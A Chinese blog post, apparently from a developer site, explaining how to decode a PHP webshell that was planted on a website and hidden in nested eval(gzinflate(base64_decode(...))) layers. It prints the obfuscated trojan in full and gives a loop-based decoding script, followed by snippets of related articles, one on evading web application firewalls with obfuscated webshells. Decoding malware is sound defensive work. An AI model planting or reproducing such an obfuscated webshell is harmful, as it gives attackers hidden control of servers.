一个PHP 代码加密(gzinflate)的解密脚本

最新推荐文章于 2025-09-07 12:24:26 发布
原创 最新推荐文章于 2025-09-07 12:24:26 发布 · 2.6k 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#脚本 #PHP #FP
针对网站被挂载的加密马,本文提供了一段具体的PHP木马代码及其解密脚本。通过一系列步骤,包括使用base64_decode和gzinflate等函数,可以逐步还原加密木马的真实内容。

看到某论坛上有人报告说网站被挂加密马,贴出来的马码如下:

<?php
eval(gzinflate(base64_decode('DdI5jptQAADQ3pIPkWpmQmHMjhJlZAzfGGwGsAFDE302Ax+zGS/8a2VrUkRJpGjqadMlXS4Qpcqc4DXv/s3r+yZrxqPJy/Ho/b+vf54ef7z78vHD909/H38//fr89O3ni/Ho5WQ8Ss6wvN3jvEpL2Ce3ITwmHPM2TqI6Tm5v5FjnUdNYs5ls0RmaLPtdGx6BWyFuiGyJtO2FMCheNmykiN639dLA6dD2GnLQgMQKGiW9Ya1oaIMVlr1UIHqPyZfNKeO7c9zz4iRd8eIZi3wSmTwvihPTFLhJiEmC7oprGuOCdvlEhnhXZ7kvSmzJXkKCSNZRIgjhYkfwGV3ivd7bCil4h2nDqfrActfIA1fUHsn11i2z7bXo8y4c0gAGgOH2SB7k2pTcY85QwbJbSg/ypeQfugSQydauj0Y32NBRHI52vV0zU2BHwT5NVykSOtLG52lxtDChM6Y15EHp5TaJVvRG0Qtuubn6XbHQA42dsUVsMRsJ4CymdoWD16rilUbkVEStNEFIAcfnHdG1s0zZA3ewGmOeV01gIwD7cpVX2qqsmu6UWP6aAkUBnmX/AHzCMOzQbC6eZPG9TcEFCucXtpQoP9BqVd63EjGl53BnPrRkvFahovVKMmVW3s4/Movs4nYnQndDpB5mpELm2RBuZUNtD/78oQj6QK0cL5LbXO45dpbXBwiracRWolz5FhCnhCUroAMiZ9Tant7p264EJ9HZpEypEEyt4ah2NJdcIGoeK0iNVZ1tQJHgy/aKpNXhEmGBniR2w4cbMI8MgZrOD24cCVapRCZny7iAHnGe1Se4cEHQb5HSaPh4gstlaxZ0KqZnseyxSdCEk97c3d29Go/un6v/Bw==')));
?>

 小研究了一下,拼凑出一个解密脚本:

<?php
$str=file_get_contents('e.txt');
while (preg_match("/eval\(gzinflate\(base64_decode\('([^']*)'/",$str,$match)){
 $str=base64_decode($match[1]);
 $str=gzinflate($str);
 echo $str;
}
$fp=fopen('d.txt','w');
fputs($fp,$str);
fclose($fp);
?>

 用法如下:

1、把木马内容保存到一个文件中,命名为e.txt
2、在相同目录再建一个空文件,命名为d.txt
3、在把解密脚本保存为文件: decode.php

4、在命令行窗口执行decode.php,执行完成后,d.txt里的就是解密木马了。

 

 

php gzinflate base64_decode 解密
10-28
php gzinflate base64_decode 解密 密码:caonima
PHPJiaMi 解密脚本
09-27
PHPJiaMi 解密脚本 使用方法:将需要解密的文件拷进encode目录,执行本文件(php phpjiami.php),解密结果在decode目录
php eval 在线解密,eval(gzinflate(base64_decode解密方法 | CN-SEC 中文网
weixin_35878683的博客
04-04 2940
今天群里一位朋友发了一个php的马子,经过了gzinflate和base64_decode加密,求解密,这种加密方法我以前也见过,只用把eval改为echo即可实现解密,但是情况并不是我想象的那么简单,输出的依然是乱码,网上找了一下终于找到了解决之道,分享给大家。PHP目前在网络中被用的越来越多,加密解密的话题也一直没有停息过。下面简单介绍一下base64_decode+gzinflate压缩编码...
php批量解密hp在线,gzinflate base64_decode 在线解密
weixin_29146313的博客
04-06 1821
PHP gzinflate base64_decode 加密代码格式: PHP文件包含字符串 eval(gzinflate(base64_decode PHP gzinflate base64_decode 在线解密 例如我需要解密一个类似如下内容的PHP加密代码: eval(gzinflate(base64_decode(fVRtb9s2EP7sAfsPF0MopUSV5LVNh9hKU3RuV...
eval(gzinflate(base64_decode解密方法
程序员无为的博客
10-28 6014
今天群里一位朋友发了一个php的马子,经过了gzinflate和base64_decode加密,求解密,这种加密方法我以前也见过,只用把eval改为echo即可实现解密,但是情况并不是我想象的那么简单,输出的依然是乱码,网上找了一下终于找到了解决之道,分享给大家。 PHP目前在网络中被用的越来越多,加密解密的话题也一直没有停息过。下面简单介绍一下base64_decode+gzinflate压缩编
php eval 在线加密,eval、gzinflate、 base64_decode三函数加密代码在线解密
weixin_29724477的博客
03-17 993
&lt;?phpeval(gzinflate(base64_decode(&#039;DZW3roRaokQ/Z 7VDoDG62kCvPemgWSE9942X/9OXtGqparySod/6redqiE9yn ydC8J7H9Fmc9F c9/ MJB BOWmJ53cc9zOcp4tX5pkjFGldd4Syh6C5TLcmrf5Io4LzRdm8uZIYr0rtx3oScc7...
php超小免杀大马_php大马免杀技巧 | bypass waf
weixin_39885166的博客
12-20 506
Part 1 前言Part 2 免杀执行代码eval 或 preg_replace的/e修饰符来执行大马代码。$a = 'phpinfo();';eval($a);//eval执行php代码编码如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。eval_gzinflate_base64类型加密解密:http://www.zhuisu.net/tool/phpencode.ph...
关于eval gzinflate base64_decode的解密方法
大方子
05-11 4052
代码 <?php eval(gzinflate(base64_decode('加密部分 '))); ?> 只需要把eval 改成echo即可输出明文内容 相关题目:https://cgctf.nuptsast.com/challenges#Web 的PHP encode 如果改为echo还是类似的内容可以使用以下的的解密方法: 解法1: &l...
风吟PHP代码加密解密技术实战
最新发布
weixin_33660045的博客
09-07 861
Base64是一种将任意二进制数据编码为ASCII字符串的编码方式,其核心目的是为了在仅支持文本传输的系统中安全传输非文本数据。由于HTTP、电子邮件、JSON等协议和格式通常只支持ASCII字符,因此Base64广泛应用于这些场景中。Base64编码并不是加密,而是基于64个可打印字符(A-Z、a-z、0-9、+、/,有时使用-和_替代+和/以适应URL编码)对数据进行编码。它将每3个字节(24位)的数据划分为4组6位,并将每组转换为一个字符,从而实现编码。若原始数据长度不是3的倍数,则使用。
eval(gzinflate(base64_decode无限加密文件的解密代码
harryxlb的专栏
07-13 2868
eval(gzinflate(base64_decode无限加密文件的解密代码: $codefile = "function.php.txt"; $fp1 = fopen($codefile, "r"); $contents = fread($fp1, filesize($codefile)); fclose($fp1); // while (preg_match("/eval\s\
eval(gzinflate(base64_decode( php代码解密方法
jqqjj的博客
04-27 3315
今天网站被人入侵了,一查已攻击都上传的文件内容,发现有 eval(gzinflate(base64_decode(‘XXXXXX’)));这类代码,自己就想查看代码执行了哪些操作。 首先去掉eval()函数,打印一下原始代码,结果发现还是类似这样的代码,原来这玩意不简单呀。 那么这些加密是怎么做到的。其实也没什么的,就是循环N次使用gzinflate压缩代码而已,我们需要通过代码再循环反解出来即可。 #解密函数 function decode($str) { $maxTimes = 1000; //
在线解密解码工具
热门推荐
eWFuZw==的博客
05-09 3万+
ASCII网页转换工具 MD5 MD5在线解密1 md5在线解密2 站长工具 Unicode编码转换-站长工具 DES加解密-站长工具 base64加解密-站长工具 base64转图片-站长工具 文本在线加解密 栅栏在线加解密 凯撒在线加解密1 凯撒在线加解密2 Fair-Play在线加解密 rabbit在线加解密 DES在线加解密 维吉尼亚在线加解密1 维吉利亚在线加解密2 Brainfuck和...
php gzinflate(),php 利用gzinflate和base64_decode加密解密示例
weixin_31679307的博客
03-12 1316
php gzinflate和base64_decode加密解密感兴趣的小伙伴,下面一起跟随512笔记的小编两巴掌来看看吧!/*** gzinflate和base64_decode加密解密** @param* @arrange 五一二笔记网: 512PiC.com**/function encode_file_contents($filename) {$type=strtolower(substr...
gzinflate java_PHP base64+gzinflate压缩编码和解码代码
weixin_34929072的博客
02-15 344
base64+gzinflate压缩编码(加密)过的文件通常是以 eval(gzinflate(base64_decode( 为头的一个php文件。以下我们给出了相关的编码解码(加密解密)代码。压缩编码(加密)代码:function encode_file_contents($filename) {$type=strtolower(substr(strrchr($filename,'.'),1)...
PHPJiaMi 解密脚本推介-免费开源
白袍小将的博客
05-13 4246
今天,在做一个PHP项目时,用到了别人的PHP代码,当用编辑器打开看时,发现这堆代码里有部分文件是经过编码变换的,摘取其中一个文件的开头部分样本如下: <?php /* PHP Encode by http://Www.PHPJiaMi.Com/ */error_reporting(0);ini_set("display_errors", 0);if(!defined...
php解密 eval( base64_decode,eval、gzinflate、 base64_decode三函数加密代码在线解密
weixin_39800875的博客
03-10 715
&lt;?phpeval(gzinflate(base64_decode(&#039;DZW3roRaokQ/Z 7VDoDG62kCvPemgWSE9942X/9OXtGqparySod/6redqiE9yn ydC8J7H9Fmc9F c9/ MJB BOWmJ53cc9zOcp4tX5pkjFGldd4Syh6C5TLcmrf5Io4LzRdm8uZIYr0rtx3oScc7...
php 禁用 chunked,chunked编码有关问题
weixin_33879932的博客
03-11 367
chunked编码问题PHP采集到的数据是chunked传输编码,gzip压缩格式的chunk编码的思路貌似是:将数据分块传输,每一块分为头部和主体字段,头部包含主体信息的长度且以16进制表示,头部和主体以回车换行符分隔,最后一块以单行的0表示分块结束。。响应头信息:Array([0]=>HTTP/1.1200OK[1]=>Server:Dict/34002[2]=&g...
PHP代码加密保护:GOTO、ENPHP、NONAME三种免费加密方案对比
Java程序员_编程开发学习笔记_网站安全运维教程_渗透技术教程
04-19 1716
php代码免费加密php.javait.cn)提供的GOTO、ENPHP和NONAME三种免费加密方案,为PHP开发者提供了多层次的代码保护选择。理解每种技术的特性和适用场景,才能为项目选择最佳的防护策略。记住,没有绝对安全的加密,但合理的保护能显著提高侵权门槛,有效捍卫您的开发成果。无论选择哪种方案,建议开发者先在小规模代码上测试,确保兼容性和功能完整性,再应用到整个项目。在知识产权保护日益重要的今天,掌握代码加密技术已成为PHP开发者的必备技能之一。
处理“error C2466: 不能分配常量大小为0 的数组”
听雨轩
11-01 8954
用C/C++写PHP的扩展模块,如果VS2005编译,可能会出现下面的错误: &lt;VS2005安装目录&gt;\VC\include\sys/stat.inl(44) : error C2466: 不能分配常量大小为 0 的数组   ,出现这种情况时,只需在 &lt;VS2005安装目录&gt;\vc\include\malloc.h 文件中找到: #define _STATIC_AS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值